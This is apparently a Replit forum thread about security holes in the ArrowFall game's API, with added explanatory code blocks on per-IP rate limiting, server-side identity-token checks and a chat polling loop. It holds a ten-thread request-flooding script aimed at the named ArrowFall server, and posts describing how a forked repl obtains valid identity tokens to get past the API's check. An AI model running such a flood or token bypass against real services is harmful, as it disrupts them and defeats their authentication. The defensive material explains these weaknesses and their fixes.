Also, someone could probably take down your API with something like this, which is really just DDoSing it. The only way I know to fix this is rate limiting and blocking IPs that are making too many requests to your API.
import requests, threading

def attack():
    # Each thread loops forever, posting to the endpoint as fast as it can
    while True:
        print("running")
        requests.post("https://ArrowFall-Server.bigminiboss.repl.co/person")

threads = []
for i in range(10):  # ten threads
    threads.append(threading.Thread(target=attack))
for thread in threads:
    thread.start()
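The mitigation named above (rate limiting plus blocking IPs that keep exceeding the limit), as an added example that is not code from the thread or from the ArrowFall project. It assumes nothing about ArrowFall's server; the limits, IP addresses and request timeline are constructed. The flooding client in the timeline is what the ten-thread loop above looks like from the server's side.

```python
"""Per-IP sliding-window rate limiting with temporary bans.

Added example; not the thread's or ArrowFall's code. The limits, IPs and
the request timeline below are constructed for the demonstration.
"""
import time
from collections import defaultdict, deque
from typing import Dict, List, Optional, Tuple


class RateLimiter:
    """At most `limit` requests per `window` seconds per client IP. A client
    that hits the limit `strikes` times is banned for `ban_seconds`, so a
    flooding client is cut off instead of being re-evaluated every request."""

    def __init__(self, limit: int = 20, window: float = 10.0,
                 strikes: int = 3, ban_seconds: float = 60.0) -> None:
        self.limit = limit
        self.window = window
        self.strikes = strikes
        self.ban_seconds = ban_seconds
        self._hits: Dict[str, deque] = defaultdict(deque)   # ip -> request times in window
        self._violations: Dict[str, int] = defaultdict(int)  # ip -> times the limit was hit
        self._banned_until: Dict[str, float] = {}            # ip -> unban time

    def is_banned(self, ip: str, now: Optional[float] = None) -> bool:
        now = time.monotonic() if now is None else now
        until = self._banned_until.get(ip)
        return until is not None and now < until

    def allow(self, ip: str, now: Optional[float] = None) -> bool:
        """Return True if the request from `ip` may be served."""
        now = time.monotonic() if now is None else now
        if self.is_banned(ip, now):
            return False
        if ip in self._banned_until:          # ban has expired: start clean
            del self._banned_until[ip]
            self._violations[ip] = 0
        recent = self._hits[ip]
        while recent and now - recent[0] >= self.window:  # drop timestamps outside the window
            recent.popleft()
        if len(recent) >= self.limit:
            self._violations[ip] += 1
            if self._violations[ip] >= self.strikes:
                self._banned_until[ip] = now + self.ban_seconds
            return False
        recent.append(now)
        return True


def constructed_requests() -> List[Tuple[float, str]]:
    """Constructed timeline: one flooding client and one ordinary client."""
    flood = [(i / 100.0, "203.0.113.7") for i in range(100)]  # 100 requests in 1 s
    normal = [(2.0 * i, "198.51.100.2") for i in range(5)]     # 5 requests over 8 s
    return sorted(flood + normal)


def simulate(requests: List[Tuple[float, str]],
             limiter: RateLimiter) -> Dict[str, Dict[str, int]]:
    """Run the timeline through the limiter and count allowed/blocked per IP."""
    stats: Dict[str, Dict[str, int]] = defaultdict(lambda: {"allowed": 0, "blocked": 0})
    for t, ip in requests:
        key = "allowed" if limiter.allow(ip, now=t) else "blocked"
        stats[ip][key] += 1
    return dict(stats)


if __name__ == "__main__":
    limiter = RateLimiter()
    for ip, counts in simulate(constructed_requests(), limiter).items():
        state = "banned" if limiter.is_banned(ip, now=1.0) else "not banned"
        print(ip, counts, state)
```

Two caveats when wiring this into a real server: the key must be the real client address (behind a reverse proxy, read X-Forwarded-For only when the request came from that proxy, otherwise clients can pick their own key), and a per-IP limit only stops a single-source flood like the script above; a genuinely distributed flood needs limits applied further upstream.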
Oh, the response code was 500, but I wasn't trying to actually change anything; I just wanted to throw some errors.
Ooh, yeah, you're probably right… ugh, but the API requires lots of requests to function… argh…
Also, I can get a valid identity token by using the same process you use to create one and submitting that.
Really? UGHHHHHHH, ARE YOU JOKING? I thought the origin repl ID prevented that…
EDIT: by origin repl ID I mean I check what the request's repl ID is; I thought that prevented it…
Well, whenever someone who isn't the owner of (or invited to) the repl runs it, like me, Replit basically makes a new version of the repl (as a security measure), so the repl ID is completely different.
For example, if you run os.environ["REPL_ID"] you will see the ID for that repl, but I would see a completely different ID.
Dang it, I found out how you do it:
- Ctrl+C
- Ctrl+D
- copy-paste functions
- make a new token
EDIT: judging by the like, it appears this is true and you have done this and hacked it.
1 Like
Yeah, Repl Identity will generate the origin repl ID as if it was a hosted repl.
Really? It doesn't for me: try running this repl and see if it says "Match!". If I run it, it does, but if I run it on an alt the repl identity is different. https://replit.com/@InvisibleOne/ENV-Test#main.py
Yeah, dang, I think you need to run the code in my repl?
from json import loads
from os import environ as env
import subprocess
import dataclasses

REPLIT_CLI = env["REPLIT_CLI"]  # path to the `replit` CLI, set in the repl's environment

@dataclasses.dataclass
class IdentityToken:
    """A Repl Identity token parsed into fields"""
    replid: str
    user: str
    slug: str
    aud: str
    ephemeral: bool = False
    origin: str = ""
    originReplId: str = ""

def create_identity_token(audience: str, cmd: str = "replit") -> str:
    """Create an identity token addressed to the given audience."""
    token = subprocess.check_output(
        [cmd, "identity", "create", f"-audience={audience}"])
    return token.decode("utf-8").strip()

def verify_identity_token(expected_audience: str,
                          token: str,
                          cmd: str = "replit") -> IdentityToken:
    """Verify the given identity token and decode it if verification passes."""
    # The CLI checks the signature and audience and prints the fields as JSON
    token = subprocess.check_output([
        cmd,
        "identity",
        "verify",
        f"-audience={expected_audience}",
        f"-token={token}",
        "-json",
    ])
    return IdentityToken(**loads(token))
Running verify_identity_token will give you the correct ID; it's outlined here and, to a lesser degree, here for Python.
Yeah, any ENVs are only in your repl; they hold completely different values if I run the code, since (as far as I know) Replit basically creates a new environment for me when I run your code (unless it's a web server).
Which is why if you publish code that writes something to a TXT file, and I run that code, nobody else but me will see the changes to the file.
Yes, I know this, but I'm pretty sure Repl Identity gets it to work? Maybe try using the ones outlined in the blog?
OK, I messed around with Repl Identity and I think the issue is you are verifying the identity in your "frontend" instead of your backend like you should (correct me if I'm wrong).
Try seeing if you can abuse this api:
“Front End”:
https://replit.com/@InvisibleOne/Token-Test#main.py
should output {"verify": True} unless you fork it, then verify will be False
“Server”
https://replit.com/@InvisibleOne/Token-Test-Server#main.py
1 Like
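The point of the last few posts (a fork can obtain a genuine token for its own repl ID, and the check must run on the server against the verified fields), as an added example that is not the thread's code and not Replit's implementation. The HMAC-SHA256 signing is a stand-in for `replit identity create` / `replit identity verify` so the example runs offline; the field names follow the IdentityToken dataclass posted above, while the key, audience, repl IDs and user names are constructed.

```python
"""Server-side authorization on a verified identity token.

Added example; not the thread's code or Replit's implementation. HMAC-SHA256
over JSON stands in for the `replit identity` CLI so this runs offline. The
key, audience, repl IDs and user names are constructed.
"""
import base64
import dataclasses
import hashlib
import hmac
import json
from typing import Dict, Optional, Tuple


@dataclasses.dataclass
class IdentityToken:
    replid: str
    user: str
    slug: str
    aud: str
    ephemeral: bool = False
    origin: str = ""
    originReplId: str = ""


# Constructed stand-in for the issuer's key. In the real system the client
# never holds it: the CLI signs on the runner's behalf and fills in the
# runner's own replid, which is why a fork gets a valid token too.
ISSUER_KEY = b"constructed-issuer-key"


def b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode()


def create_identity_token(fields: IdentityToken) -> str:
    """Issue a signed token for whatever repl the runner is in."""
    payload = json.dumps(dataclasses.asdict(fields), sort_keys=True).encode()
    mac = hmac.new(ISSUER_KEY, payload, hashlib.sha256).digest()
    return b64(payload) + "." + b64(mac)


def verify_identity_token(expected_audience: str, token: str) -> IdentityToken:
    """Check signature and audience; raise ValueError on any failure."""
    try:
        payload_b64, mac_b64 = token.split(".")
        payload = base64.urlsafe_b64decode(payload_b64)
        mac = base64.urlsafe_b64decode(mac_b64)
    except ValueError:
        raise ValueError("malformed token")
    expected = hmac.new(ISSUER_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):
        raise ValueError("bad signature")
    fields = IdentityToken(**json.loads(payload))
    if fields.aud != expected_audience:
        raise ValueError("audience mismatch")
    return fields


SERVER_AUDIENCE = "arrowfall-server"    # constructed
TRUSTED_REPLIDS = {"0000-owner-repl"}   # constructed: the published client repl


def authorize(token: str,
              client_claims: Optional[Dict[str, object]] = None) -> Tuple[bool, str]:
    """The backend decision. `client_claims` is whatever JSON the client sent
    alongside the token (e.g. {"verify": True}); it is deliberately ignored."""
    try:
        fields = verify_identity_token(SERVER_AUDIENCE, token)
    except ValueError as err:
        return False, f"rejected: {err}"
    if fields.replid not in TRUSTED_REPLIDS:   # a fork verifies fine but is a different repl
        return False, f"rejected: replid {fields.replid} is not trusted"
    return True, f"ok: {fields.user} from {fields.replid}"


def demo_results() -> Dict[str, Tuple[bool, str]]:
    """Constructed scenarios: owner, fork, wrong audience, forged replid."""
    owner = IdentityToken("0000-owner-repl", "owner", "ArrowFall-Client", SERVER_AUDIENCE)
    fork = IdentityToken("9999-fork-repl", "attacker", "ArrowFall-Client", SERVER_AUDIENCE)
    wrong_aud = dataclasses.replace(owner, aud="some-other-service")
    fork_token = create_identity_token(fork)
    # The fork rewrites its payload to claim the owner's replid but cannot re-sign it
    owner_payload = json.dumps(dataclasses.asdict(owner), sort_keys=True).encode()
    forged = b64(owner_payload) + "." + fork_token.split(".")[1]
    return {
        "owner": authorize(create_identity_token(owner)),
        "fork": authorize(fork_token, client_claims={"verify": True}),
        "wrong_audience": authorize(create_identity_token(wrong_aud)),
        "forged_replid": authorize(forged),
    }
```

With the real CLI the same comparison goes on the IdentityToken that the thread's verify_identity_token returns, on the server that owns the audience: token validity alone only proves that some repl ran the client, and the replid is what says which one.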
Cool, but how did you make a chat system that is lagless and updating at the same time? When I tried to create a chat system it started lagging because of the threads.
bigminiboss will probably know better, but I'm assuming the code is just waiting for events and then updating; if you are constantly updating it will get super laggy.
Yes, this is what it's doing: it checks for new events every second but only updates the console when it receives a new message.
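The loop just described (poll on a fixed interval, redraw only when something new arrived), as an added example that is not the thread's or ArrowFall's code. The in-memory ChatServer is a constructed stand-in for the real API; the users, messages and interval are constructed too.

```python
"""Poll-on-an-interval, redraw-on-change chat loop.

Added example; not the thread's or ArrowFall's code. ChatServer is a
constructed stand-in for the API; messages and users are constructed.
"""
import time
from typing import Callable, List, Tuple

Message = Tuple[int, str, str]   # (id, user, text)


class ChatServer:
    """Messages get increasing IDs so a client can ask only for what it
    has not seen yet, instead of re-fetching and re-rendering everything."""

    def __init__(self) -> None:
        self._messages: List[Message] = []

    def post(self, user: str, text: str) -> int:
        message_id = len(self._messages) + 1
        self._messages.append((message_id, user, text))
        return message_id

    def events_since(self, last_id: int) -> List[Message]:
        return [m for m in self._messages if m[0] > last_id]


class ChatClient:
    def __init__(self, server: ChatServer,
                 render: Callable[[List[Message]], None]) -> None:
        self.server = server
        self.render = render
        self.last_id = 0     # cursor: highest message ID already shown
        self.redraws = 0
        self.polls = 0

    def poll_once(self) -> int:
        """One tick: fetch events newer than the cursor; redraw only if any."""
        self.polls += 1
        new = self.server.events_since(self.last_id)
        if not new:
            return 0
        self.last_id = new[-1][0]
        self.redraws += 1
        self.render(new)
        return len(new)

    def run(self, ticks: int, interval: float = 1.0) -> None:
        """Single loop, no per-message threads: one poll per interval."""
        for _ in range(ticks):
            self.poll_once()
            time.sleep(interval)


def simulate() -> Tuple[int, int, int]:
    """Constructed session; returns (polls, redraws, messages_received)."""
    server = ChatServer()
    shown: List[Message] = []
    client = ChatClient(server, render=shown.extend)
    server.post("alice", "hi")
    server.post("bob", "hello")
    client.poll_once()   # two new messages -> one redraw
    client.poll_once()   # nothing new -> no redraw
    server.post("alice", "anyone there?")
    client.poll_once()   # one new message -> second redraw
    client.poll_once()   # still nothing
    return client.polls, client.redraws, len(shown)
```

The cursor is what keeps the console quiet: four polls here produce only two redraws, and each redraw touches only the messages that arrived since the last one.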
Arrowfall is down currently, any explanation why?
The main dev, Overdrive, decided they found the project too taxing to be currently released, as they were pressured into releasing it after grinding on it for a month with about 60 hours total, and they were experiencing burnout. Therefore, they may re-release it after bug fixing, but they also may never release it again.
2 Likes
Got it, thanks!
Words so I can post this.